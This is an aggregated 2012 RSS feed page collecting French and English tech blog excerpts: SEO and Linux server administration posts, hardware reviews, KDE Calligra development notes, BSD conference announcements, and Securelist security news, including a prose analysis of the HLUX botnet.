Channel Image08:19 Présence de fichiers .DS_Store et Thumbs.db : organiser le contrôle d’intégrité sur votre serveur Web avec Afick» Denis Szalkowski Formateur Consultant
La présence du fichier .DS_Store peut être le stigmate d'une intrusion réussie.La présence de fichiers .DS_Store sur un serveur Linux est le marqueur d'un accès distant réalisé avec Mac OS X. Le logiciel Afick est une solution extrêmement simple pour vérifier l'intégrité des fichiers de votre serveur Web.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image04:22 SERP : des résultats différents selon le navigateur ?» Denis Szalkowski Formateur Consultant
Les résultats de la recherche Google seraient-ils différents selon le navigateur utilisé ?

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Mon 05 March, 2012

Channel Image09:44 Google+ : le flop se confirme !» Denis Szalkowski Formateur Consultant
Google+ : le flop se confirme !Au vu des dernières statistiques fournies par Médiamétrie Netratings et Comcore, la question est de savoir s'il faut continuer à passer du temps sur le réseau social Google+.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image07:45 Publication automatique dans Google+ via Twitter» Denis Szalkowski Formateur Consultant
Rss 2 Google+J'ai enfin trouvé une solution de publication automatique d'un fil Rss vers Google+ via Twitter. La solution s'appelle TwooglePlus. Il s'agit de cross-posting.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:00 AMD Radeon HD 7870 And 7850 Review: Pitcairn Gets Benchmarked» Reviews Tom's Hardware US
AMD Radeon HD 7870 And 7850 Review: Pitcairn Gets BenchmarkedThere's a big hole in between AMD's $450 Radeon HD 7950 and its $160 Radeon HD 7700. Today, the company introduces Radeon HD 7850 and 7870 to fill that gap, and they push a lot more performance than we expected. But are they really ready for prime time?

Sun 04 March, 2012

Channel Image20:03 RJ TextEd Bêta 2 - v8.00 Multi (Fr)» ToutFr.com - Les traductions mises à jour
RJ TextEd est un outil de développement web et un éditeur de texte Unicode.
Channel Image19:54 Net Transport - v1.94 Build 282» ToutFr.com - Les traductions mises à jour
La meilleure solution à l'heure actuelle. A essayer de toute urgence.
Channel Image19:53 NetXfer - v2.96b Build 615» ToutFr.com - Les traductions mises à jour
La meilleure solution à l'heure actuelle. A essayer de toute urgence
Channel Image19:52 ZipGenius - v6.3.2.3110 Fra» ToutFr.com - Les traductions mises à jour
Performant, fiable, gratuit et en langue française, ZipGenius est un logiciel de
Channel Image19:41 FlashGet (Fr) - v3.7.0.1195» ToutFr.com - Les traductions mises à jour
Stable, en français et entièrement gratuit !
Channel Image10:18 Audience : plus de 44000 visites en février 2012 !» Denis Szalkowski Formateur Consultant
Ça fait pas de mal à dire du bien de soi-même !Avec 44177 visites au cours de ce mois de février 2012, l'audience de ce site vient de connaître un nouveau record ! Je tiens, très chaleureusement, à vous en remercier.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Sat 03 March, 2012

Channel Image19:03 cpu-z - v1.60.0 Fra» ToutFr.com - Les traductions mises à jour
Gratuit et léger CPU-Z est tout simplement un must

Fri 02 March, 2012

Channel Image17:24 DNSChanger - Cleaning Up 4 Million Infected Hosts» Securelist / Blog

The internet is full of infected hosts. Let's just make a conservative guesstimate that there are more than 40 million infected victim hosts and malware serving "hosts" connected to the internet at any one time, including both traditional computing devices, network devices and smartphones. That's a lot of resources churning out cybercrime, viruses, worms, exploits, spyware. There have been many suggestions about how to go about cleaning up the mess, the challenges are complex, and current cleanups taking longer than expected.

Mass exploitation continues to be an ongoing effort for cybercriminals and a major problem - it's partly a numbers game for them. Although exploiting and infecting millions of machines may attract LE attention at some point, it's a risk some are willing to take in pursuit of millions of dollars that could probably be better made elsewhere with the same effort. So take, for example, the current DNSChanger cleanup. Here is a traditional profit motivated 4 million PC and Mac node malware case worked by the Fbi, finishing with a successful set of arrests and server takedown.

Channel Image14:21 Where is my privacy?» Securelist / Blog
When we upload something embarrassing about ourselves to, let´s say Facebook, that´s completely our fault. But there are other subtle ways to get information about us. Let´s say a few words about tracking.

Every time you visit a website you request HTML that will be rendered in your local browser. This code may include external references, so you will request them as well. Nothing to be afraid of so far.
Channel Image10:06 EuroBSDCon 2012 Call For Proposals Is Out» OpenBSD Journal
The organizers of EuroBSDCon 2012 wrote in to tell us that their Call For Proposals is out:

EuroBSDcon is the European technical conference for users and developers on BSD-based systems. The EuroBSDcon 2012 conference will be held in Warsaw, Poland from Thursday 18 October 2012 to Sunday 21 October 2012, with tutorials on Thursday and Friday and talks on Saturday and Sunday.

Read more...

Channel Image06:00 How Well Will Mass Effect 3 Run On Your PC? » Reviews Tom's Hardware US
How Well Will Mass Effect 3 Run On Your PC? On March 6th, BioWare will launch Mass Effect 3, the final chapter in Shepherd's epic journey. We take the game's demo for a spin in anticipation of how this highly-anticipated title will behave on a broad range of graphics cards and processors.

Thu 01 March, 2012

Channel Image23:57 Kubuntu 12.04 LTS Beta 1» blogs.kde.org blogs

This week I've been on Ubuntu release driver duty for Beta 1. Ubuntu has lots of flavours there days and they all need to be nudged to ensure they get their testing and announcements done in time. We only had a few hiccups, some of the flavours had to be respun late last night for fixes and do lots of testing today. Ubuntu (poor under-resourced flavour that it is) also didn't update their upgrade instructions in good time and some grumping at them was needed (sorry, I get grumpy quickly these days with my traumatised brain). Slashdot linked to the wrong URL for downloading Ubuntu CDs so I had to put in a quick redirect to point them at the announcement where the correct URLs are.

Here is the Kubuntu Beta 1 announcement showing nice features like Telepathy-KDE and a big OwnCloud update.

And for anyone worried about the future of Kubuntu, Kubuntu 12.04 to be Supported for 5 Years reaffirms that we will be treating 12.04 like any other LTS, only 2 years longer. It also affirms that we will be continuing Kubuntu in the same way I have run it for the last 7 years, as a successful community made Ubuntu flavour.

Channel Image06:00 Ten 60 GB SandForce-Based Boot Drives, Rounded-Up» Reviews Tom's Hardware US
Ten 60 GB SandForce-Based Boot Drives, Rounded-UpWhat makes one SandForce-based SSD different from the others that appear to be just like it? We round up 10 models with 60 GB of capacity to explore the effects of NAND interfaces. We also stumble across some interesting data related to full drives.

Wed 29 February, 2012

Channel Image06:00 Battle At $140: Can An APU Beat An Intel CPU And Add-In Graphics?» Reviews Tom's Hardware US
Battle At $140: Can An APU Beat An Intel CPU And Add-In Graphics?What can you get for $140? How about AMD's top-of-the-line A8-3870K APU with four CPU cores and an integrated Radeon HD 6550D? That's also enough for a Pentium G620 and discrete Radeon HD 6670. We benchmark both to uncover the best budget-oriented option.

Tue 28 February, 2012

Channel Image07:07 SERP : différences chez Google via https://encrypted.google.com/» Denis Szalkowski Formateur Consultant
SERP : différences chez Google via https://encrypted.google.com/La recherche selon qu'elle soit réalisée à partir de google.fr ou https://encrypted.google.com donne des résultats différents. Évidemment, il ne s'agit par des mêmes serveurs !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:19 SERP : 40 changements dans la recherche Google» Denis Szalkowski Formateur Consultant
Google annonce avoir procédé à 40 changements dans les résultats des pages issues de la recherche. L'objectif initié avec la mise en œuvre de Google Panda est de fournir un contenu de meilleure qualité.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:00 Best SSDs For The Money: February 2012» Reviews Tom's Hardware US
Best SSDs For The Money: February 2012After Valentine's Day, SSDs prices fell once again, and we updated our list to reflect those changes. This month, the best deals are found in the $200-300 range, and there's one bargain in our list for a 240 GB SSD that you simply will not want to miss.
Channel Image05:00 Mobile World Congress 2012: Nokia, Asus, Intel, Samsung, And LG» Reviews Tom's Hardware US
Mobile World Congress 2012: Nokia, Asus, Intel, Samsung, And LGTom's Hardware spent its first day in Barcelona, Spain at this year's Mobile World Congress. After a long day of press conferences and private meetings, we wanted to share our experiences before hitting the show floor tomorrow.

Mon 27 February, 2012

Channel Image20:43 Identifier son lecteur Dvd sous Linux» Denis Szalkowski Formateur Consultant
Identifier votre lecteur Dvd sous LinuxJe ne disposais toujours pas de méthode fiable pour identifier un lecteur Dvd sous Linux. Cette fois, je la tiens : c'est la bonne ! Mais, pourquoi, diantre, n'y avais-je pas pensé plus tôt ?

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image11:05 Rsyslog : centraliser les journaux des machines Linux» Denis Szalkowski Formateur Consultant
Rsyslog nous fournit, sous Linux, tous les événements liés au fonctionnement du système. En quelques minutes, vous pourrez, très rapidement, centraliser ces messages sur une seule machine.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:00 Six $200-$260 LGA 2011 Motherboards, Reviewed» Reviews Tom's Hardware US
Six $200-$260 LGA 2011 Motherboards, ReviewedWe know that Intel's X79 Express platform hosts the fastest desktop processors in the company's portfolio. But can it be made more affordable? We round up the least-expensive $200-$260 motherboards to determine how much you have to give up for cheap X79.

Sun 26 February, 2012

Channel Image12:06 SERP : Baidu et Yandex tiennent compte des caractères accentués !» Denis Szalkowski Formateur Consultant
A l'heure de l'hyper-mondialisation, pouvons-nous aujourd'hui encore nous permettre le luxe d'ignorer des moteurs tels que Baidu ou Yandex dans le référencement de nos sites ? Pour autant, devons-nous aller jusqu’à intégrer leurs spécificités dans le SEO de sites de lange française, là, c'est une tout autre affaire !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Sat 25 February, 2012

Channel Image13:13 Absence de fil RSS : un signe d’incompétence en matière de SEO ?» Denis Szalkowski Formateur Consultant
Référencement : dans le trou du flux !Avec l'absence de fichier robots.txt, j'évoquais récemment un signal faible en termes de compétences en SEO. Mais alors, que dire de l'absence sur un site de fil(s) RSS développé par un développeur qui s'auto-proclame expert en référencement ?

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image07:26 Signaux forts et signaux faibles dans le domaine de la station de travail» Denis Szalkowski Formateur Consultant
Signal fort ou signal faible ?Microsoft n'est-il pas en train de perdre la bataille de la station de travail au profit d'Apple ?

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:14 Désintox, fact checking, contre-enquêtes (MAJ)» Denis Szalkowski Formateur Consultant
La presse française au travers des sites Désintox, des Décodeurs, de Contrôle technique ou encore de la Vigie 2012 nous propose désormais des sites de fact checking. Dans la perspective de l'élection présidentielle de 2012, ces sites nous seront, sans doute, très précieux pour réaliser notre choix !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Fri 24 February, 2012

Channel Image07:16 BSD-Day 2012: Invitation» OpenBSD Journal
Gabor Pali wrote in to announce and invite OpenBSDers to the upcoming BSD-Day in Vienna, Austria. Gabor writes,

Dear All,

I am glad to inform you that we are again organizing a "DanuBSDCon" (aka. BSD-Day). It is going to be held at the UAS Technikum Wien in Vienna, Austria on Saturday May 5, 2012 as part of the Austrian Linuxweeks (Linuxwochen).

We would like to invite everybody — anybody who is just looking for an excuse to make a short trip to Central Europe, spend a nice weekend in Vienna, join us for a beer, talk about her favourite topic, or meet fellow developers from the region (and from other BSD flavours), or accidentally will not be able to make it to Canada :-)

So, please contact me if you are interested!

Channel Image06:00 Toshiba's $7000+ 400 GB SSD: SAS 6Gb/s, SLC Flash, And Big Endurance» Reviews Tom's Hardware US
Toshiba's $7000+ 400 GB SSD: SAS 6Gb/s, SLC Flash, And Big EnduranceHave you ever wondered what separates an enterprise SSD from a consumer-oriented drive? How about SLC and MLC flash (and a corresponding price gap)? We explore the differences with Toshiba's MK4001GRZB SSD, an obviously enterprise-oriented powerhouse.

Thu 23 February, 2012

Channel Image23:06 Calligra Words: undo/redo framework» blogs.kde.org blogs

As C.Boemann already said, we met at my place for two days in order to fix some serious issues we had with the undo/redo framework in Calligra Words (and Stage for that matter).

The undo/redo framework is something I wrote when I first started contributing to KOffice about 3 years ago. I have to say that I was not really looking forward having to jump into this stuff again. I am not such a masochist and the memories I have of writing this are not ones of an easy glide.
It actually turned out to be really fun and gratifying. There were some headaches involved to be sure but overall I really enjoyed it.

To summarise a bit (more detailed description bellow for the hard hearted): we use Qt Scribe framework for our document. When an edition is done on a QTextDocument, it emits a signal telling that an undo/redo action was added on the QTextDocument internal undoStack. The application listens to this signal and can create an undo action on its stack to match QTextDocument's internal one.
The initial framework I created basically followed that behaviour. There was one thing that it was never meant to handle: nested commands. This means that when nesting commands, like for example the delete command now contains a deleteInlineObject command, the framework would create 2 commands on the application's stack.

So we sat with Boemann thinking how to solve that problem. In the end we only needed to add, instead of a single head command member in the framework, a stack of head commands.
Now we have a framework which is way more complete and solid, plus it is now documented in the code.
There are some improvements we could already think of to make the API a bit more flexible, but we can be confident now that we have solid foundations for the upcoming Calligra Words releases.

Overall, I had a really good time coding with C.Boemann, who is not only a very talented coder but also somebody I really appreciate. It is amazing to see what we achieved in those just two days.

A bit more details:

As I said, we use QTextDocuments to hold the data of one text frame (text shapes). This document is edited through a specific handler: a KoTextEditor. This editor is not only responsible for editing the QTextDocument but also to listen to the QTextDocument's undoCommandAdded signal and keep our application's stack in sync.
There are 3 use cases of our undo/redo framework:
- editing done within the KoTextEditor
- complete commands pushed on the KoTextEditor by an external tool
- on-the-fly macro commands

In addition to this, there are two special cases in editing QTextDocument: inserting text and deleting text. These two actions only trigger a signal on the first edit. Any subsequent compatible edit is "merged" into the original edit command and will not trigger a signal. Inserting text and deleting are therefore open ended actions, as far as our framework is concerned.

In order to handle this, a sort of state machine is used. The KoTextEditor can be in a NoOp, KeyPress, Delete, Format or Custom state. Furthermore, for each signal received from the QTextDocument, we create a "dummy" UndoTextCommand, whose sole purpose is to call QTextDocument::undo or QTextDocument::redo. These commands need to be parented to a command which we push on our application's stack. This head command will call undo or redo on all its children when the user press undo or redo in the application.
In order to allow for nested head commands, we maintain a stack. Its top-most command will be the parent of the signal induced UndoTextCommands.
Depending on the KoTextEditor state and commandStack, new head commands are pushed on the commandStack, or the current top command is popped.

I will not enter into more details here, if you are interested in the whole gory logic of this, you can look at the code in calligra/libs/kotext/KoTextEditor_undo.cpp (which for now lies in the text_undo_munichsprint git branch). The code has now been pretty well documented, something I had not done before.

That's it for today. Once again, I ask from as much of you to try our next test release, specifically the undo/redo framework, so that we can ensure that we release a really good stable Calligra Words.

Channel Image17:58 Here Come the Tax Spammers!» Securelist / Blog

It’s that time of year again, time to fill out your taxes and pay your part. We’ve seen more than a few examples of Tax and IRS related spam. Yesterday I received mail with an interesting approach:

Channel Image06:00 AMD FX Vs. Intel Core i3: Exploring Game Performance With Cheap GPUs» Reviews Tom's Hardware US
AMD FX Vs. Intel Core i3: Exploring Game Performance With Cheap GPUsFollowing our sub-$200 gaming CPU comparison, we put Intel's Core i3-2100 and AMD's FX-4100 under the microscope. This time, we test a number of different graphics cards from AMD to see how GPUs affect perceived processor bottlenecks.

Wed 22 February, 2012

Channel Image06:00 Acer, Dell, LG, And Samsung: Four 23" LCD Monitors, Rounded-Up» Reviews Tom's Hardware US
Acer, Dell, LG, And Samsung: Four 23In our first LCD round-up of the year, we put four monitors thorough our benchmark suite and find some surprising results. Even if you're an enthusiast with cash to spare, paying more doesn't guarantee a better display. Our tests explain why.

Tue 21 February, 2012

Channel Image06:00 Web Browser Grand Prix 9: Chrome 17, Firefox 10, And Ubuntu» Reviews Tom's Hardware US
Web Browser Grand Prix 9: Chrome 17, Firefox 10, And UbuntuLast month, we ran WBGP VIII on a MacBook Air, representing browser performance in a native Mac environment. Today we're returning to the PC. But the cross-platform comparison theme continues with a long-overdue rematch to WBGP 2: The Linux Circuit.
Channel Image04:30 Réflexion au débotté» Denis Szalkowski Formateur Consultant
Les prix baissent et, pourtant, Le nombre des intermédiaires augmente. Qui capte la valeur ?

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Mon 20 February, 2012

Channel Image12:01 Mini sprint on undo in Calligra Words» blogs.kde.org blogs

I'm at PierreSt's house in Munich for a minisprint trying to fix the undo system in Calligra Words. I arrived Sunday evening, and we started immediately discussing how we would solve the issues we are facing. Luckily we seem to have the same idea and understanding of the issues.

Today, Monday, we have started hacking. But let me explain a bit about the problems we are having:

Words is using QTextDocument for storage of the actual characters, but we embellish this with all sorts of homegrown stuff, for inline images, change tracking etc. QTextDocument has it's own undo stack but since Words can do those other things too we need to combine that with undoCommands of our own.

It's when we need to make macro commands that combine our commands with those of QTextDocument that we run into trouble. Partly because the framework wasn't taking subcommanding into consideration, and partly because no one realy understood what went on so we used the framework wrongly. We are now correcting both of these issues.

If all goes well we might create a Release Candidate of Calligra in 2 weeks or so.

Channel Image07:07 B2B2C : les principales places de marché françaises» Denis Szalkowski Formateur Consultant
Alexa fournit un indicateur intéressant de l'audience des sites des places de marché françaises, à l'heure de la convergence entre boutiques en ligne, grandes surfaces et enseignes de vente par correspondance.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Sun 19 February, 2012

Channel Image18:03 Netlinking : des blogs fantoches signés Amazon.fr !» Denis Szalkowski Formateur Consultant
L'homme au chapeau rouge !Trouvez-vous bien normal qu'une société commerciale telle qu'Amazon.fr multiplie les blogs Blogger pour faire de la retape sur ses articles ?

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image07:33 Détecter les tentatives d’intrusion sur un serveur Web Linux» Denis Szalkowski Formateur Consultant
Détecter des tentatives d'intrusion sur les serveurs Web LinuxComme très souvent sur Linux, la gestion des logs de connexion est d'une simplicité extrême. Surveillez, comme le lait sur le feu, les changements qui pourraient intervenir sur votre fichier /var/log/btmp. S'il enfle anormalement, c'est que vous êtes victime de nombreuses tentatives d'intrusion.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:16 Comment avoir la peau des erreurs 404 ?» Denis Szalkowski Formateur Consultant
Error 404 !Au cours des derniers mois, le nombre d'erreurs 404 n'a cessé d'enfler. Leur augmentation n'est souvent que la traduction de tentatives d'intrusion assez grossières. J'ai fait, pour ma part, le choix de la redirection 301. Trois mois après, il s'avère extrêmement payante !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Sat 18 February, 2012

Channel Image18:54 Activer IPv6 au niveau des hébergements mutualisés OVH» Denis Szalkowski Formateur Consultant
Une poignée de secondes vous seront nécessaires pour activer IPv6 au niveau de votre hébergement OVH. N'attendez pas : faites-le dès maintenant ! Soyez prêts pour le 6 juin 2012.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image13:22 Informatique 2012 – Semaine 5 et 6» Denis Szalkowski Formateur Consultant
Google, entreprise spécialisée dans le vol de données confidentielles ?Au menu de ces deux semaines : le site Btjunkie qui ferme, la HADOPI, 53% des internautes sur Facebook, Google Chrome qui continue son irrésistible ascension, la taxe Google, les usages en termes de visionnage de vidéos sur Internet, Google qui pirate les utilisateurs d'iPhone, la censure selon Google et Facebook en Inde, la censure en Chine et en Iran, Nokia qui délocalise en Chine, la PQR française bien mal en point, les ventes de PC qui choient en Europe, Dassault Systèmes qui rachète Netvibes, le PHP, la lenteur de Java et Objective-C, SUSE à l'honneur, le télétravail en berne, les Javateux les mieux payés aux Etats-Unis, l'emploi grâce à Internet, des vulnérabilités du côté de Microsoft Internet Explorer et d'Adobe Flash Player comme d'habitude !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image11:13 Les DNS publics Google accessibles en IPv6» Denis Szalkowski Formateur Consultant
Google propose ses DNS publics en IPv6. Vous pouvez aussi utiliser ceux d'OpenDNS, qui offre l'avantage de vous permettre de filtrer les sites accédés. Pratique lorsqu'on a de jeunes gens à la maison !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image10:25 Ubuntu Server 11.10» Denis Szalkowski Formateur Consultant
Ubuntu Server Oneiric 11.10 Par rapport à CentOS, Ubuntu Server possède l'avantage de permettre un saut de version majeure sans réinstallation. De mon point de vue, CentOS a pour principal intérêt un très faible niveau de consommation de ressources et aussi sa gestion de paquets avec yum-priorities.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Fri 17 February, 2012

Channel Image08:45 Les commentaires sont fermés de l’intérieur !» Denis Szalkowski Formateur Consultant
J'ai pris la décision de désactiver tous les commentaires dans l'espace de ce site. Un merci tout particulier à mon pote Gildas et aussi à Cécile !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:00 Overclocking: Can Sandy Bridge-E Be Made More Efficient?» Reviews Tom's Hardware US
Overclocking: Can Sandy Bridge-E Be Made More Efficient?Intel's six-core processors are fast, but enthusiasts almost always want to push unlocked multipliers harder. Core i7-3960X can easily exceed 4 GHz, but what happens to power efficiency when clock rates go up? Sandy Bridge-E demonstrates weaknesses there.

Thu 16 February, 2012

Channel Image18:47 De l’intérêt des commentaires !» Denis Szalkowski Formateur Consultant
Je ne sais plus qui est le con dans l'affaire !"vous avez pris 48 ans ? vous serez à Fleury-Mérogis à partir de quand ? C’est pour qu’on passe vous refiler des pêches (ça change des oranges et ça défoule davantage)" A la lecture de ce bout de commentaire issu d'un titulaire de DEA, je me pose cette question : dois-je continuer à vous imposer de tels commentaires aussi affligeants ?

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image14:55 Calligra Words and the road to release» blogs.kde.org blogs

The Calligra Suite recently released the 7th beta, and mostly because Calligra Words is still not ready. Building a new application from scratch takes time.

Until around October the focus was on writing a new text layout system that could provide the rich text support that any user demands these days. We were not able to reuse the code from KOffice as it was simply not up to the job. So this took a lot of effort.

And then just as we thought we only had to do final touches before we could release we found out that the styles subsystem we (myself included) had created in the KOffice days had huge deficiencies as well. Basically the user would lose data related to the style hierarchy. It was a complete mess and took 2 months to sort out.

At around the same time we found that the lists handling were a complete mess as well (again partly to blame myself, but we learn as we go). So we had to sort that out too, which took about the same two months

Then in December we again tried to do some of the final touches to get the release ready. This time focusing on undo/redo of shapes, and how the shapes are anchored to text. That turned out to take a couple of weeks.

In January we looked at undo/redo for normal text editing and to our horror it turned out to be another can of worms, which we havn't solved yet. It's related to the purpose of how the code has gradually changed. We now need to rethink the structure of it. On February 19th I'll fly to Munich for a 4 day mini sprint, graciously sponsored by KDE e.v. to sort this out. At least we have a plan for how we will solve it.

When I get back home we'll probably tag an 8th beta.

But during all this fixing we have also implemented a lot of new features. Table of contents, editable footnotes, bibliography, new statistics docker, a great styles combobox, a novel new approach to the ui in general.

So all in all we have had great progress while also making sure most things work. Obviously we have not solved every little bug, as no application is ever bug free. But at some point we do need to release and that point is coming closer and closer. So stay tuned.

Channel Image13:48 Calligra Words is not a fork of KWord» blogs.kde.org blogs

Pretty often I hear people say that Calligra Words is a fork of KWord. As a maintainer I tell you this not true. Sure we have ripped about 20% of the code from KWord but even that has been dismantled and reassemble in a new way.

That doesn't constitute a fork. Calligra Words is effectively a new word processor. We have more in common with Stage than we do with KWord. We even started the development of Words by disabling what was KWord, and then we built Words by slowly adding functionality .

Channel Image07:10 Supports SQL (DML, DDL) sous Oracle» Denis Szalkowski Formateur Consultant
Quel rapport entre le SQL sous Oracle et Tombouctou ? Evident !De SQL à Tombouctou... Seuls les étudiants de 2e année de l'HETIC qui ont eu à me subir dans le cadre de mon enseignement relatif au SQL sous Oracle pourront comprendre ! Plus sérieusement, je mets à votre disposition deux supports de cours sur le SQL (DML et DDL) sous Oracle. J'espère qu'ils vous seront utiles.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:00 Big Air: 14 LGA 2011-Compatible Coolers For Core i7-3000, Reviewed» Reviews Tom's Hardware US
Big Air: 14 LGA 2011-Compatible Coolers For Core i7-3000, ReviewedDo Intel’s Core i7-3000-series CPUs really need closed-loop liquid cooling? Today we're testing fourteen different LGA 2011-compatible air coolers on an overclocked Core i7-3960X in order to determine whose is the most effective.

Wed 15 February, 2012

Channel Image21:12 KDEPIM Git Resource» blogs.kde.org blogs

KDEPIM Git Resource

You can now monitor any git repository with KMail. Commits will appear as e-mails in the message list.

KMail configuration:

Resource configuration:

Message list:

It will do a git fetch every 5 minutes or so.

This is still a playground project, so it has some limitations:
- Only master is supported yet
- If authentication is needed for the git-fetch, you must run ssh-add
in the same terminal where you're going to start akonadi. ( ssh-add && akonadictl restart )

While not needing to depend on commitfilter.kde.org or other external notification services is great, this wasn't my primary reason for creating this resource.

I did it because we can, or rather "since KDEPIM>4.4 we can".

Thanks to the new KDEPIM architecture, the application is now really decoupled from the data and that opens us a world of possibilities.

The git resource took me only 8 hours of coding, without needing to touch a single line of KMail code, therefore not introducing any regressions.

The barrier to contribute new features to kontact has never been so low.

--
git clone git://anongit.kde.org/akonadi-git-resource

Channel Image13:51 Chroot Ssh avec le protocole Sftp» Denis Szalkowski Formateur Consultant
Depuis la version 4.4, OpenSSH supporte de chrooter les utilisateurs au travers du protocole SFTP. Seul souci : cette version d'OpenSSH est indisponible pour les serveurs exécutant CentOS 5 ou Red Hat 5 !!!

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image10:54 The where and why of HLUX» Securelist / Blog

This is not the first time the HLUX botnet has been mentioned in this blog, but there are still some unanswered questions that we’ve been receiving from the media: What is the botnet’s sphere of activity? What sort of commands does it receive from malicious users? How does the bot spread? How many infected computers are there in the botnet?

Before answering the questions it’s important to clarify that the HLUX botnet we previously disabled is still under control and the infected machines are not receiving commands from the C&C, so they’re not sending spam. Together with Microsoft’s Digital Crimes Unit, SurfNET and Kyrus Tech, Inc., Kaspersky Lab executed a sinkhole operation, which disabled the botnet and its backup infrastructure from the C&C.

The answers below refer to a new version of the HLUX botnet - it’s a different botnet but the malware being used is build using the same HLUX coding. Analysis of a new bot version for the HLUX botnet (md5: 010AC0BFF69EB945108B57B40A4784BE, size: 882176 B) revealed the following information.

Why?

As we already known, the bot distributes spam and has the ability to conduct DDoS attacks. In addition, we have discovered that:

  1. The bot is capable of infecting flash drives, creating a file on them called “Copy a Shortcut to google.Ink” in the same way Stuxnet did.
  2. The bot can search for configuration files for numerous FTP clients and transfer them to its command servers.
  3. The bot has a built-in Bitcoin wallet theft feature.
  4. The bot also includes a Bitcoin miner feature.
  5. The bot can operate in proxy server mode.
  6. The bot searches hard drives for files containing email addresses.
  7. The bot has a sniffer for intercepting email, FTP and HTTP session passwords.


Part of the HLUX code that interacts with FTP clients


Part of the HLUX code used to steal Bitcoin wallets

Where does it come from?

The bot is loaded onto users’ computers from numerous sites hosted on fast flux domains primarily in the .EU domain zone. The bot installs small downloaders (~47 KB) on the system. These downloaders have been detected on computers in the GBOT and Virut botnets. The downloaders can be loaded to computers within minutes of a machine being infected by the malware mentioned above (GBOT and Virut). This distribution method hinders the detection of the primary bot distribution source.

Bot installations have also been detected during drive-by attacks that make use of the Incognito exploit kit.

The number of computers in the new HLUX botnet is estimated to be tens of thousands, based on the numbers in the approximately 8000 IP addresses detected in operations conducted via P2P.

Where’s it going?

As before, the HLUX botnet primarily receives commands to distribute spam. However, another malicious program, which we wrote about here, is also being installed on the botnet. Its main functionality is fraudulent manipulation of search engines along the lines of TDSS.

The passwords harvested from FTP are used to place malicious Javascripts on websites that redirect users of the compromised sites once again to Incognito exploit kit. Exploits for the CVE-2011-3544 vulnerability are primarily used when the bot is installed during these attacks. In other words, HLUX implements a cyclical distribution scheme just like that used by Bredolab.

Summary

The HLUX botnet, both old and new, is a classic example of organized crime in action on the Internet. The owners of this botnet take part in just about every type of online scam going: sending spam, theft of passwords, manipulation of search engines, DDoS etc.

It is not uncommon for new versions of botnets to appear, and it’s one of the challenges we face in the IT security industry. We can neutralize botnet attacks and delay cyber criminal activities but ultimately the only way to take botnets down is to arrest and persecute the creators and groups operating them. This is a difficult task because security companies face different federal policies and legislation in various countries where botnets are located. This causes the law enforcement investigations and legal process to be a long and arduous process.

We’ll continue monitoring this particular botnet and keep you up to speed with any technical developments.

P.S. We noticed this on one fast flux domain that was earlier spreading HLUX:


It’s not yet clear whether this is the control panel of the HLUX botnet.

Channel Image08:00 L’escadrille des huns compétents du SEO !» Denis Szalkowski Formateur Consultant
L'escadrille des huns compétents du SEO !Retour sur les tweets et les commentaires qui ont accompagné la publication de mon billet relatif à l'un des éléments d'évaluation formels de la compétence d'un expert autoproclamé du SEO et du référencement !

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:00 AMD Radeon HD 7770 And 7750 Review: Familiar Speed, Less Power» Reviews Tom's Hardware US
AMD Radeon HD 7770 And 7750 Review: Familiar Speed, Less PowerThese are the lowest-end cards built using AMD's new Graphics Core Next architecture. Is 28 nm manufacturing, a fresh design, and new functionality enough to warrant upgrading existing value-oriented champs like the Radeon HD 6850 and GeForce GTX 460?

Tue 14 February, 2012

Channel Image19:40 Patch Tuesday February 2012» Securelist / Blog

Microsoft is releasing 9 Security Bulletins this month (MS12-008 through MS12-016), patching a total 21 vulnerabilities. Some of these vulnerabilities may enable remote code execution (RCE) in limited circumstances, and offensive security researchers have claimed that a "bug" fixed this month should be client-side remote exploitable, but after months of public circulation, there have been no known working exploits.

The prioritized vulnerabilities patched this month exist in Internet Explorer, a specific version of the C runtime, and .NET framework. The Internet Explorer and .NET framework vulnerabilities may result in a potential drive-by exploits, so consumers and businesses alike should immediately install these patches - mass exploitation is likely to be delivered via COTS exploit packs like Blackhole and its ilk.

Channel Image18:53 Debian GNU/Linux = $19 billion» David A. Wheeler's Blog

Debian developer James Bromberger recently posted the interesting ”Debian Wheezy: US$19 Billion. Your price… FREE!”, where he explains why the newest Debian distribution (“Wheezy”) would have taken $19 billion U.S. dollars to develop if it had been developed as proprietary software. This post was picked up in the news article ”Perth coder finds new Debian ‘worth’ $18 billion” (by Liam Tung, IT News, February 14, 2012).

You can view this as an update of my More than a Gigabuck: Estimating GNU/Linux’s Size, since it uses my approach and even uses my tool sloccount. Anyone who says “open source software can’t scale to large systems” clearly isn’t paying attention.

Channel Image18:03 Will the PIN hacks be the end of Google Wallet?» Securelist / Blog

